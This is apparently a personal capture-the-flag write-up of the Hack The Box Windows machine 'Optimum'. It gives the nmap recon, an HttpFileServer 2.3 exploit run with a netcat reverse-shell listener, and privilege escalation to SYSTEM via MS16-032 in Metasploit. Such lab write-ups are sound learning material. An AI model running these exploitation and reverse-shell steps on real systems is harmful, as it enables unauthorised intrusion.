I decided to give myself a challenge with my first HTB box by running through a Windows box which is something that I currently do not much have experience with.
Recon
Starting off, we do some basic recon with nmap for the top 1000 ports, running a banner-grabbing script to check for services
nmap 10.10.10.8 -sV --script=banner | tee nmap-optimum.txtThis reveals an open http port running HttpFileServer
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-09 03:40 EST
Nmap scan report for 10.10.10.8
Host is up (0.022s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.60 seconds
While continuing to do recon, we’ll run a wider nmap scan to find any less-common ports that may be open. In this case, no more open ports were found.
nmap 10.10.10.8 -p- --script=bannerSecondly, I use whatweb to look for any other technologies the page may be using aside from the HttpFileServer that was picked up in the nmap scan.
whatweb 10.10.10.8 | tee whatweb-optimum.txtThis doesn’t reveal any new information that may be worthwhile currently, although its useful enough to save for later.
Foothold
Now that we have some information to work with, we can start looking for exploits to gain shell. Using searchsploit, I searched for the file server version we found during the nmap scan.
searchsploit -t HttpFileServer 2.3
Download the file from Exploit-DB page located here and open up the .py file. Inside the file we can edit the following lines to enable the exploit to work on the target.
lhost = "10.10.14.3"
lport = 4444
rhost = "10.10.10.8"
rport = 80
In a separate terminal window, run a netcat listener with the following command.
nc -lvnp 4444Finally, run the exploit with:
python3 49584.py
Once we’re here, the flag is located within the directory we land in: C:\Users\kostas\Desktop as user.txt
Priv Esc
Now that we have shell on to the box, we can check what access we have using net localgroup administrators. From here, we can see that there is only one local administrator named Administrator.
We can also see that there is the built-in guest account, which will not be of use to us.
After some hunting around for potential vulnerabilities, checking systeminfo, we can see some information about the system we are currently on.
Host Name: OPTIMUM
OS Name: Microsoft Windows Server 2012 R2 Standard
OS Version: 6.3.9600 N/A Build 9600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00252-70000-00000-AA535
Original Install Date: 18/3/2017, 1:51:36 ??
System Boot Time: 15/11/2024, 7:36:03 ??
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2645 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/11/2020
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest
Total Physical Memory: 4.095 MB
Available Physical Memory: 3.476 MB
Virtual Memory: Max Size: 5.503 MB
Virtual Memory: Available: 4.908 MB
Virtual Memory: In Use: 595 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: \OPTIMUM
Hotfix(s): 31 Hotfix(s) Installed.
[01]: KB2959936
[02]: KB2896496
[03]: KB2919355
[04]: KB2920189
[05]: KB2928120
[06]: KB2931358
[07]: KB2931366
[08]: KB2933826
[09]: KB2938772
[10]: KB2949621
[11]: KB2954879
[12]: KB2958262
[13]: KB2958263
[14]: KB2961072
[15]: KB2965500
[16]: KB2966407
[17]: KB2967917
[18]: KB2971203
[19]: KB2971850
[20]: KB2973351
[21]: KB2973448
[22]: KB2975061
[23]: KB2976627
[24]: KB2977629
[25]: KB2981580
[26]: KB2987107
[27]: KB2989647
[28]: KB2998527
[29]: KB3000850
[30]: KB3003057
[31]: KB3014442
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) 82574L Gigabit Network Connection
Connection Name: Ethernet0
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.8
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.What we are most interested in here is OS Name and OS Version, being Microsoft Windows Server 2012 R2 Standard 6.3.9600 N/A Build 9600.
A quick Google search leads us to find a privilege escalation vulnerability on Exploit-DB named MS16-032, located here.
From here, we have two options – checking if this is in Metasploit, or checking if we can find a better version from elsewhere on the internet, as future me found out there are several issues with invoking this PowerShell script from a standard terminal.
After several hours of attempts, I found the easiest (and least buggy way) of getting root was via Metasploit.
PrivEsc with Metasploit
After opening Metasploit, search for rejetto_hfs_exec and select it. We need to set up a reverse shell first to run the MS16-032 exploit via Metasploit.
lhost = 10.10.14.3
lport = 9999
rhosts = 10.10.10.8
rport = 80Once that’s set, hit run and watch the magic happen!
Once the Meterpreter session is created, background the session with the command background, and search for MS16-032, selecting the x64 version with use 2.
Then, your lhost, lport and session to:
lhost = 10.10.14.3
lport = 5555
session = 1Once you run, it will hang for a moment, the script should run, and if all went according to plan, you now have root access on the box! Within the meterpreter session, type shell to gain access to the command line.
You can confirm you are root by typing whoami – if you appear as nt authority\system, then you’re in. Now it’s as simple as navigating to C:/Users/Administrator/Desktop and reading the file root.txt file.
Room complete!
Issues and Afterthoughts
As this was my first Windows box, there were quite a few hurdles to get through. A large portion of this came from doing enumeration and file transfer once arriving on the box with the shell, however the vast majority of pain on this box was from the MS16-032 exploit and attempting to get that working.
I initially attempted to use WinPEASS (link here), however after multiple failed attempts due to the shell hanging when trying to run anything that was not an individual module, I started to manually search for potential vulnerabilities.
Secondly, there was some learning opportunities from learning to use impacket to copy files via the SMB server (link here).
The main problem however was attempting to use the exploit from Exploit-DB for MS16-032, as researching how to use this without reading a walkthrough on this room proved extremely challenging, as most of the examples were being run directly via PowerShell while remotely connected to the box.
I did find in my research that this required PowerShell x64 to be used, as this is what the exploit needed to run. In this case however, no matter how much I tried, I could not get this to work while connected via the shell.
I did learn some useful PowerShell information while connected to the target on a shell, such as -c flag to run commands without locking up the shell, and -executionpolicy bypass to run dangerous scripts.
In hindsight, picking a newer box and not spending nearly as much time attempting to avoid Metasploit would have been advantageous, as I would have not spent most of my afternoon troubleshooting attempting to fix something I already had a solution for.
It would also be worthwhile to investigate more Windows enumeration methods going forward to avoid manually hunting for vulnerabilities.
